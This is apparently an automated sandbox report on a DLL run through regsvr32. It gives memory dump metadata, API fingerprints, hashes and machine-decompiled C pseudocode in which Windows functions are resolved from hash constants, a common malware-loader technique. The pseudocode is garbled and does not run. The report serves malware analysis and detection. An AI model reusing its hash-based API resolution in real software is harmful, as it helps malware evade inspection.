                  • Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
                  • String ID:
                  • API String ID: 1448584724-0
                  • Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
                  • Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
                  • String ID: h
                  • API String ID: 3316326719-2439710439
                  • Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
                  • Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 31%
                  			E0000000118000970C(void* __ebx, void* __ecx, void* __ebp, void* __esp, void* __fp0, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
                  				void* __rdi;
                  				signed int _t56;
                  				int _t61;
                  				intOrPtr _t78;
                  				intOrPtr _t79;
                  				struct _CRITICAL_SECTION* _t125;
                  				long long _t128;
                  				intOrPtr* _t154;
                  				struct _CRITICAL_SECTION* _t158;
                  				long long _t165;
                  				intOrPtr* _t166;
                  				void* _t169;
                  				void* _t170;
                  				void* _t172;
                  				signed long long _t181;
                  				struct _CRITICAL_SECTION* _t183;
                  				struct _CRITICAL_SECTION* _t187;
                  				void* _t190;
                  				void* _t193;
                  				void* _t194;
                  
                  				_t181 = __r11;
                  				_t172 = __r8;
                  				_t130 = __rbx;
                  				 *((long long*)(_t169 + 0x10)) = __rbx;
                  				 *((long long*)(_t169 + 0x18)) = _t165;
                  				 *((long long*)(_t169 + 0x20)) = __rsi;
                  				_t170 = _t169 - 0x60;
                  				_t163 =  *__rcx;
                  				r14d = r8d;
                  				_t194 = __rdx;
                  				_t166 = __rcx;
                  				 *((long long*)(_t170 + 0x58)) =  *__rcx;
                  				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
                  				E000000011800045E8(__ebx, __ecx, __rbx, __rcx,  *__rcx, __rcx, _t193, _t190);
                  				EnterCriticalSection(_t187);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(_t183);
                  				r11d =  *(_t166 + 0x70) & 0x000000ff;
                  				_t56 =  *(_t166 + 0x50) & 0x000000ff;
                  				if (r11d - _t56 >= 0) goto 0x800097e8;
                  				_t154 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x48)) + _t181 * 8));
                  				_t78 =  *_t154;
                  				if (_t78 == dil) goto 0x800097aa;
                  				if (_t78 == 0x2f) goto 0x800097a5;
                  				_t79 =  *((intOrPtr*)(_t154 + 1));
                  				if (_t79 != dil) goto 0x80009796;
                  				if (_t79 != dil) goto 0x800097ad;
                  				_t125 = _t158;
                  				if (_t125 == _t158) goto 0x800097c5;
                  				if ( *((char*)(_t125 - 1)) != 0x3a) goto 0x800097c5;
                  				if ( *((char*)(_t125 + 1)) != 0x2f) goto 0x800097c5;
                  				E00000001180001C00(_t130, _t181 + _t154, _t154, _t158, _t163, _t166);
                  				if (_t125 == _t158) goto 0x800097e8;
                  				 *(_t170 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				if (_t125 == _t158) goto 0x8000996c;
                  				r9d = 0;
                  				r8d = r14d;
                  				 *((long long*)(_t170 + 0x38)) = _t170 + 0x40;
                  				 *((long long*)(_t170 + 0x30)) = _t170 + 0x48;
                  				_t24 = _t170 + 0x50; // 0x32
                  				_t128 = _t24;
                  				 *((long long*)(_t170 + 0x28)) = _t128;
                  				 *((intOrPtr*)(_t170 + 0x20)) = 0;
                  				if (E00000001180006108(_t130, _t166, __rdx, _t172) != 0) goto 0x8000995c;
                  				_t191 =  *_t166;
                  				EnterCriticalSection(_t158);
                  				asm("lock inc ecx");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t166 + 0x18)) == _t158) goto 0x8000986b;
                  				E00000001180001C00(_t130,  *((intOrPtr*)(_t166 + 0x18)), __rdx, _t158, _t163, _t166);
                  				goto 0x80009873;
                  				asm("lock inc ecx");
                  				if ( *(_t170 + 0x90) == _t158) goto 0x8000993c;
                  				r14d = lstrlenA(??);
                  				_t61 = lstrlenA(??);
                  				_t32 = _t191 + 2; // 0x2
                  				r15d = _t61;
                  				E00000001180001C00( *(_t170 + 0x90), _t125, __rdx, _t158, _t163, _t166);
                  				if (_t128 == _t158) goto 0x8000992e;
                  				_t33 = _t194 + 1; // 0x1
                  				r8d = _t33;
                  				 *((char*)( *_t166 + _t128)) = 0x2f;
                  				memcpy(??, ??, ??);
                  				dil =  *(_t170 + 0x90) != 0;
                  				 *((intOrPtr*)(_t170 + 0x38)) = 2;
                  				 *((long long*)(_t170 + 0x30)) =  *((intOrPtr*)(_t170 + 0xb8));
                  				 *((long long*)(_t170 + 0x28)) =  *((intOrPtr*)(_t170 + 0xb0));
                  				 *((intOrPtr*)(_t170 + 0x20)) =  *((intOrPtr*)(_t170 + 0x40));
                  				if (E000000011800088B4(_t56 + 2, _t56 + 2 == 8, _t128 + _t32, __ebp, __esp, __fp0,  *(_t170 + 0x90),  *((intOrPtr*)(_t170 + 0x58)), _t128,  *((intOrPtr*)(_t170 + 0xb0)), _t163, _t128,  *((intOrPtr*)(_t170 + 0x50)),  *((intOrPtr*)(_t170 + 0x48)), _t181) != 0x10d2) goto 0x80009920;
                  				asm("sbb eax, eax");
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009971;
                  				return 8;
                  			}























                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x180009711
                  0x180009716
                  0x180009724
                  0x18000972f
                  0x18000973b
                  0x18000973e
                  0x180009741
                  0x180009744
                  0x18000974f
                  0x180009753
                  0x18000975c
                  0x180009762
                  0x18000976b
                  0x180009771
                  0x180009776
                  0x18000977d
                  0x180009788
                  0x18000978f
                  0x180009794
                  0x180009799
                  0x18000979e
                  0x1800097a3
                  0x1800097a8
                  0x1800097aa
                  0x1800097b0
                  0x1800097b6
                  0x1800097bc
                  0x1800097cc
                  0x1800097d7
                  0x1800097e1
                  0x1800097e8
                  0x1800097f0
                  0x1800097fb
                  0x1800097fe
                  0x180009801
                  0x18000980e
                  0x180009813
                  0x180009813
                  0x18000981b
                  0x180009820
                  0x18000982d
                  0x180009833
                  0x180009840
                  0x180009846
                  0x180009850
                  0x18000985d
                  0x180009861
                  0x180009869
                  0x180009873
                  0x18000987c
                  0x18000988e
                  0x180009891
                  0x18000989a
                  0x18000989f
                  0x1800098a2
                  0x1800098ad
                  0x1800098af
                  0x1800098af
                  0x1800098bb
                  0x1800098c0
                  0x1800098e3
                  0x1800098ed
                  0x1800098f9
                  0x180009902
                  0x180009907
                  0x180009917
                  0x18000991c
                  0x180009928
                  0x180009936
                  0x180009946
                  0x180009956
                  0x180009964
                  0x18000996a
                  0x180009990

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
                  • String ID:
                  • API String ID: 4119546182-0
                  • Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
                  • Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocCreateErrorHeapLastPipememset
                  • String ID: .RK
                  • API String ID: 2695650488-3354657194
                  • Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
                  • Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
                  • String ID:
                  • API String ID: 2518601019-0
                  • Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
                  • Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
                  • String ID:
                  • API String ID: 4260168601-0
                  • Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
                  • Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
                  • String ID: h
                  • API String ID: 1962595928-2439710439
                  • Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
                  • Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CloseHandle$ProcessTerminate
                  • String ID:
                  • API String ID: 1541851893-0
                  • Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
                  • Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E000000011800020DC(void* __edi, long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
                  				void* _t28;
                  				void* _t31;
                  				intOrPtr _t43;
                  				intOrPtr _t44;
                  				signed int _t45;
                  				long long* _t82;
                  				void* _t83;
                  				void* _t84;
                  				long long* _t85;
                  				void* _t105;
                  				long long _t109;
                  				void* _t112;
                  				void* _t113;
                  				void* _t122;
                  				int _t124;
                  				int _t127;
                  				intOrPtr* _t128;
                  				void* _t130;
                  				CHAR* _t132;
                  
                  				_t82 = __rax;
                  				 *((long long*)(_t112 + 8)) = __rbx;
                  				 *((long long*)(_t112 + 0x18)) = _t109;
                  				 *((long long*)(_t112 + 0x20)) = __rsi;
                  				_t113 = _t112 - 0x1c0;
                  				_t110 =  *0x8000d4a0;
                  				_t128 = __rdx;
                  				r14d = 0;
                  				 *(_t113 + 0x1f8) = lstrlenA(_t132);
                  				memset(_t130, _t127, _t124);
                  				_t6 = _t105 + 1; // 0x1
                  				_t7 = _t130 + 2; // 0x2
                  				r11d = _t7;
                  				r8d = _t6;
                  				 *__rdx = r11w;
                  				HeapAlloc(_t105, ??);
                  				if (__rax == 0) goto 0x80002287;
                  				_t28 = memcpy(??, ??, ??);
                  				_t43 =  *((intOrPtr*)(__rax));
                  				if (_t43 == dil) goto 0x80002192;
                  				if (_t43 == 0x3a) goto 0x8000218d;
                  				_t44 =  *((intOrPtr*)(__rax + 1));
                  				if (_t44 != dil) goto 0x8000217d;
                  				if (_t44 != dil) goto 0x80002195;
                  				_t122 = _t105;
                  				if (_t122 == _t105) goto 0x800021d9;
                  				_t8 = _t122 + 1; // 0x1
                  				 *_t122 = dil;
                  				if (_t8 == _t105) goto 0x800021d9;
                  				if (E000000011800038F8(_t28, 0, _t8, _t113 + 0x1f8) == 0) goto 0x80002279;
                  				_t45 =  *(_t113 + 0x1f8) & 0x0000ffff;
                  				asm("ror cx, 0x8");
                  				 *(_t128 + 2) = _t45;
                  				if (_t45 == 0) goto 0x80002279;
                  				E0000000118000459C(_t29, 0x25fff021,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t82 == _t105) goto 0x800021f5;
                  				_t31 =  *_t82();
                  				goto 0x800021f8;
                  				_t83 = _t105;
                  				if (_t83 != _t105) goto 0x8000224d;
                  				E0000000118000459C(_t31, 0xb27f4910,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t83 == _t105) goto 0x8000221e;
                  				 *_t83();
                  				goto 0x80002220;
                  				if (0 != 0) goto 0x80002249;
                  				r14d = 1;
                  				E0000000118000459C(0, 0x25fff021,  *((intOrPtr*)(_t110 + 0x30)));
                  				if (_t83 == _t105) goto 0x80002241;
                  				 *_t83();
                  				goto 0x80002244;
                  				_t84 = _t105;
                  				if (_t84 != _t105) goto 0x8000224d;
                  				goto 0x8000225f;
                  				_t85 =  *((intOrPtr*)(_t84 + 0x18));
                  				 *((intOrPtr*)(_t128 + 4)) =  *((intOrPtr*)( *_t85));
                  				if (r14d == 0) goto 0x80002279;
                  				E0000000118000459C( *((intOrPtr*)( *_t85)), 0x9cb92d3f,  *((intOrPtr*)(_t110 + 0x30)));
                  				if (_t85 == _t105) goto 0x80002279;
                  				 *_t85();
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}






















                  0x1800020dc
                  0x1800020dc
                  0x1800020e1
                  0x1800020e6
                  0x1800020f4
                  0x1800020fb
                  0x180002108
                  0x180002112
                  0x180002122
                  0x180002136
                  0x18000213b
                  0x18000213e
                  0x18000213e
                  0x180002142
                  0x18000214a
                  0x180002151
                  0x18000215d
                  0x18000216c
                  0x180002171
                  0x18000217b
                  0x180002180
                  0x180002185
                  0x18000218b
                  0x180002190
                  0x180002192
                  0x180002198
                  0x18000219a
                  0x18000219e
                  0x1800021a4
                  0x1800021b9
                  0x1800021bf
                  0x1800021c7
                  0x1800021cb
                  0x1800021d3
                  0x1800021e4
                  0x1800021ec
                  0x1800021f1
                  0x1800021f3
                  0x1800021f5
                  0x1800021fb
                  0x180002206
                  0x18000220e
                  0x18000221a
                  0x18000221c
                  0x180002222
                  0x18000222a
                  0x180002230
                  0x180002238
                  0x18000223d
                  0x18000223f
                  0x180002241
                  0x180002247
                  0x18000224b
                  0x18000224d
                  0x18000225b
                  0x180002262
                  0x18000226d
                  0x180002275
                  0x180002277
                  0x180002281
                  0x1800022a9

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlenmemcpymemset
                  • String ID: lJu
                  • API String ID: 1735321128-4100297759
                  • Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
                  • Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00000001180005DF8(void* __ebx, void* __ecx, void* __fp0, long long __rbx, intOrPtr* __rcx, void* __r8) {
                  				void* _t41;
                  				void* _t50;
                  				signed long long _t92;
                  				long _t115;
                  				intOrPtr* _t116;
                  				void* _t118;
                  				long _t121;
                  				void* _t125;
                  				void* _t126;
                  				long _t134;
                  				void* _t137;
                  
                  				 *((long long*)(_t125 + 0x18)) = __rbx;
                  				_t126 = _t125 - 0x30;
                  				_t92 =  *0x8000d4a0;
                  				_t122 =  *__rcx;
                  				r13d = 0;
                  				_t116 = __rcx;
                  				 *(__rcx + 0x5c) = r13d;
                  				 *(_t126 + 0x68) = r13d;
                  				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
                  				 *(_t126 + 0x60) = 4;
                  				E0000000118000459C(_t41, 0x5431d47a,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t92 == _t137) goto 0x80005e56;
                  				 *_t92();
                  				goto 0x80005e59;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				E0000000118000459C(r13d, 0xbe782669,  *((intOrPtr*)(_t122 + 0x50)));
                  				if (_t92 == _t137) goto 0x80005e9d;
                  				_t10 = _t126 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t126 + 0x28)) = _t10;
                  				 *((long long*)(_t126 + 0x20)) = _t126 + 0x60;
                  				 *_t92();
                  				goto 0x80005ea0;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				 *(_t126 + 0x68) = r13d;
                  				 *(_t126 + 0x60) = r13d;
                  				E0000000118000459C(r13d, 0xbe782669,  *((intOrPtr*)(_t122 + 0x50)));
                  				if (_t92 == _t137) goto 0x80005eea;
                  				_t19 = _t126 + 0x68; // 0xa
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(_t126 + 0x28)) = _t19;
                  				 *((long long*)(_t126 + 0x20)) = _t126 + 0x60;
                  				 *_t92();
                  				r8d =  *(_t126 + 0x60);
                  				_t50 = HeapAlloc(_t137, _t134, _t115);
                  				if (_t92 == _t137) goto 0x80005fad;
                  				E0000000118000459C(_t50, 0xbe782669,  *((intOrPtr*)(_t122 + 0x50)));
                  				if (_t92 == _t137) goto 0x80005f43;
                  				_t27 = _t126 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t126 + 0x28)) = _t27;
                  				 *((long long*)(_t126 + 0x20)) = _t126 + 0x60;
                  				 *_t92();
                  				goto 0x80005f46;
                  				if (r13d == r13d) goto 0x80005f95;
                  				 *(_t126 + 0x60) =  *(_t126 + 0x60) >> 1;
                  				 *((intOrPtr*)(_t92 + _t92 * 2)) = r13w;
                  				r8d =  *(_t126 + 0x60);
                  				HeapAlloc(_t118, _t121);
                  				if (_t92 == _t137) goto 0x80005f8e;
                  				r8d =  *(_t126 + 0x60);
                  				r8d = r8d + 1;
                  				wcstombs(??, ??, ??);
                  				 *(_t116 + 0x20) = _t92;
                  				goto 0x80005f9d;
                  				goto 0x80005f9d;
                  				GetLastError();
                  				HeapFree(??, ??, ??);
                  				goto 0x80005fbc;
                  				goto 0x80005fbc;
                  				return GetLastError();
                  			}














                  0x180005df8
                  0x180005e04
                  0x180005e08
                  0x180005e12
                  0x180005e19
                  0x180005e1c
                  0x180005e1f
                  0x180005e23
                  0x180005e2b
                  0x180005e31
                  0x180005e42
                  0x180005e4a
                  0x180005e52
                  0x180005e54
                  0x180005e5c
                  0x180005e6b
                  0x180005e73
                  0x180005e75
                  0x180005e7e
                  0x180005e81
                  0x180005e90
                  0x180005e99
                  0x180005e9b
                  0x180005ea3
                  0x180005ea9
                  0x180005eae
                  0x180005ebc
                  0x180005ec4
                  0x180005ec6
                  0x180005ecb
                  0x180005ece
                  0x180005ed1
                  0x180005edf
                  0x180005ee8
                  0x180005eea
                  0x180005ef8
                  0x180005f04
                  0x180005f13
                  0x180005f1b
                  0x180005f1d
                  0x180005f22
                  0x180005f28
                  0x180005f36
                  0x180005f3f
                  0x180005f41
                  0x180005f49
                  0x180005f56
                  0x180005f5a
                  0x180005f5f
                  0x180005f67
                  0x180005f73
                  0x180005f75
                  0x180005f80
                  0x180005f83
                  0x180005f88
                  0x180005f8c
                  0x180005f93
                  0x180005f95
                  0x180005fa5
                  0x180005fab
                  0x180005fb2
                  0x180005fce

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Alloc$ErrorFreeLastwcstombs
                  • String ID:
                  • API String ID: 4133724704-0
                  • Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
                  • Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E00000001180003FCC(void* __ecx, void* __edx, intOrPtr* __rcx, void* __r9) {
                  				void* __rbx;
                  				void* __rbp;
                  				void* _t32;
                  				void* _t37;
                  				void* _t72;
                  				long long* _t88;
                  				long long* _t89;
                  				void* _t91;
                  				intOrPtr* _t110;
                  				void* _t113;
                  
                  				_t112 =  *__rcx;
                  				_t88 =  *0x8000d4a0;
                  				_t110 = __rcx;
                  				 *(_t113 + 0x58) =  *(_t113 + 0x58) & 0;
                  				E0000000118000459C(_t32, 0x3a7e805d,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == 0) goto 0x8000400e;
                  				 *_t88();
                  				goto 0x80004010;
                  				if (0 == 0) goto 0x80004151;
                  				if ( *((intOrPtr*)(_t113 + 0x50)) == 0) goto 0x8000414c;
                  				 *0x8000d028();
                  				if (0 != 0) goto 0x80004145;
                  				r8d = 0x1000;
                  				_t37 = HeapAlloc(??, ??, ??);
                  				if (_t88 == 0) goto 0x80004133;
                  				E0000000118000459C(_t37, 0x3cd8e449,  *((intOrPtr*)(_t112 + 0x50)));
                  				if (_t88 == 0) goto 0x8000408d;
                  				r8d = 0x1000;
                  				r8d =  <  ?  *((void*)(_t113 + 0x50)) : r8d;
                  				 *_t88();
                  				goto 0x8000408f;
                  				if (0 == 0) goto 0x800040b7;
                  				r8d =  *(_t113 + 0x58);
                  				r9d = 0;
                  				_t89 =  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x60))));
                  				 *((intOrPtr*)(_t89 + 0x20))();
                  				r11d =  *(_t113 + 0x58);
                  				 *((intOrPtr*)(_t113 + 0x50)) =  *((intOrPtr*)(_t113 + 0x50)) - r11d;
                  				if (0 == 0) goto 0x800040bf;
